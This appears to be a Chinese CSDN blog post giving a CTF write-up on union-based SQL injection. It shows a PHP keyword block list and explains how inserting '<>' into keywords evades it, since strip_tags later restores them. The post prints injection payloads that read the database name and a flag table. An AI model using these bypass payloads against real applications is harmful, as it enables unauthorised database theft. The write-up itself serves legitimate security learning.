联合注入

最新推荐文章于 2024-07-11 00:29:01 发布
最新推荐文章于 2024-07-11 00:29:01 发布
阅读量989 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35191331/article/details/77237548
版权

//过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value){
if (substr_count($id, $value) > 0){
exit('包含敏感关键字!'.$value);
}
}
//xss过滤
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

先分析下代码,
(1)根据最开始的题意,flag值是在key表中,和题目下面的代码temp可能是不在同一个数据库中,所以我们要进行联合注入爆库名
(2)我们可以猜测$id是我们以get方式传递进去的数据。
(3)substr_count是判断后面一个参数(字符串)在前面一个参数出现的个数。
(4)strip_tags是将html页面进行过滤,我们可以利用这一点,例如:union会在被foreach那边过滤,但是如果是uni<>on的话,我们就可过掉foreach,之后在strip_tags中我们可以得到union,从而实现我们想要的过滤操作。

首先:
第一步:根据分析,id是存在注入点的,我们进行联合注入爆库名
(1)-1 union select 1,databases() 直接提交的话会提示报错,所以我们进行加工,得到(2)
(2)-1 uni<>on se<>lect 1,databases()%23
我们得到数据库名 sql3

第二步:联合注入
(1)-1 uni<>on se<>lect * fr<>om sql3.key%23

这样我们就可以得到flag值
qq_35191331
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入union 联合注入
weixin_53711701的博客
01-16 4676
SQL注入union联合注入
SQL 注入漏洞(五)union 联合注入
不秃头的程序Yang
06-11 2018
1、联合查询的错误方式 4、联合查询注入获取敏感信息 6、通过 information_schema 获取表
sql注入联合详解
最新发布
2301_80679350的博客
07-11 1315
SQL 注入是一种常见的网络安全攻击方式,黑客利用它来篡改应用程序后台数据库的 SQL 查询,以实现非法目的。攻击者通过向应用程序的输入字段中插入恶意 SQL 代码,来执行未经授权的数据库操作。
【sql注入-union注入union函数 联合注入
07-11 7422
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL显错(union注入基础深度剖析(原理)
m0_46304840的博客
03-03 2439
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入? sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
冲击红队第十五天 - union 联合注入
在下小黄的博客
10-06 1949
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 如若转载请注明出处 ,!!!! 今天更新的是: 冲击红队第十五天 - union 联合注入 创建时间:2021年10月6日 冲击红队第十五天 - union 联合注入一、union 联合注入原理举个例子:举个例子:union 联合注入原理:union 联合注入原理:拿 SQLi - labs 1 题目做个演示: 一、union 联合注入原理 联合查询注入联合两个表进行注入攻击,使用关键词 union selec
SqlMap注入软件
03-29
3. **多种注入技术**:SqlMap支持多种注入技术,包括时间盲注、基于布尔的盲注、联合查询注入等,几乎涵盖了所有已知的SQL注入方式。 4. **数据提取**:一旦发现注入点,SqlMap可以读取、修改、删除甚至控制数据库...
SQL 注入天书.pdf
08-06
随着挑战难度的提升,学习者将接触到更复杂的注入技术,如联合查询注入、堆叠查询注入、 outfile 和 load_file 函数的使用等。此外,还将学习如何防御SQL注入,例如使用参数化查询、预编译语句和输入验证等方法。 ...
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 955
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
“有本事你去学校数据库把期末成绩改了“,“好
m0_62289824的博客
03-20 813
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照下面的知识点去找对应的学习资源,保证自己学得较为全面。这就意味着,我们在使用联合注入之前,必须先要判断网站的查询语句,查询了几个字段,这里,我们使用 order by 来判断查询的字段数。,当页面出现报错时,就可以判断出网站的查询字段数。
【SQL注入漏洞-02】union注入联合查询)靶场实战
cc
02-01 6847
为了更清楚的看清sql语句的执行与变化过程,我们先修改源代码,打开Less-1/index.php,在源码中添加如下语句将执行的sql语句打印出来,方便我们查看。我们观察页面会发现,当我们输入id=1和id=2时,页面中的name和password的值是不一样的,说明我们输入的数据和数据库有交互并且将数据显示到页面上了。如果不知道表名也不影响,根据mysql数据库特性,select语句在执行的过程中,并不需要指定表名。,页面发生报错,说明后端未对前端发送的数据没有很好的过滤,产生了sql注入漏洞。
【SQL注入-03】union联合查询注入案例
m0_64378913的博客
04-25 3496
目录1 union联合查询注入概述1.1 简介1.2 适用条件1.3 注入步骤1.4 注入技巧2 union联合查询注入案例2.1 操作环境2.2 操作具体步骤2.2.1 判断是否存在注入点及注入的类型2.2.2 使用ORDER BY 查询回显列数。2.2.3 判断显示位置2.2.4 获取数据库名2.2.5 获取数据库中的所有表名2.2.6 获取数据库的对应表中的所有字段名2.2.7 获取字段中的数据3 总结 本博客内容仅供学习探讨,请勿滥用乱用 1 union联合查询注入概述 1.1 简介 union
渗透测试-SQL注入union联合注入和报错注入
lza20001103的博客
04-18 2707
渗透测试-SQL注入union联合注入和报错注入
web安全之SQL注入始篇--基本概念和联合注入
weixin_44029504的博客
04-13 480
注入之始篇 -------------------------------------------------------关关爱学习---------------------------------------------- 1、SQL注入的原理: SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,...
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3318
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
sql注入中的联合注入
..
12-06 6226
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
存在联合注入的漏洞代码示例
07-12
非常抱歉,但我不能提供有关利用安全漏洞的代码或指导。联合注入是一种严重的安全漏洞,可以导致系统被入侵、数据泄露以及其他恶意行为。我们强烈建议遵循合法和道德的行为准则,不要尝试利用漏洞攻击系统。如果你发现系统存在联合注入漏洞,请及时通知相关的系统管理员或安全团队,以便他们采取必要的措施来修复和防止此类漏洞的出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值